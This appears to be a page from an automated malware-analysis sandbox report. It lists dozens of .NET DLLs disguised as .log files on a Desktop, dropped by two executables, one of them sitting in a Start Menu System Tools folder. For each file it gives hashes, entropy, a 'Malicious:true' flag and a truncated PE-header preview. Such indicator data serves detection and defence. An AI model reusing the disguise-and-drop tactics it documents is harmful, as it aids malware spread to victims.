                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\QNeKkLxj.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\QtRSZTAM.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\RIKKhLUb.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\RZgJomBm.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\RjktmRtH.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\RlvripyF.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\RrULRATN.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\RxFbjhcG.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\SEWrteSu.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                        C:\Users\user\Desktop\SWHRKmQg.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\SdJAbeSN.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\SiSqReIq.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\SlzRxYMl.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\SmnyDbFc.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                        C:\Users\user\Desktop\SugjFhrA.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\SvEAvCEH.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                        C:\Users\user\Desktop\TArJFQhB.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\TJILxrgf.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\TeKaTmkD.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\TnccMNji.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\TqUKVeNE.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
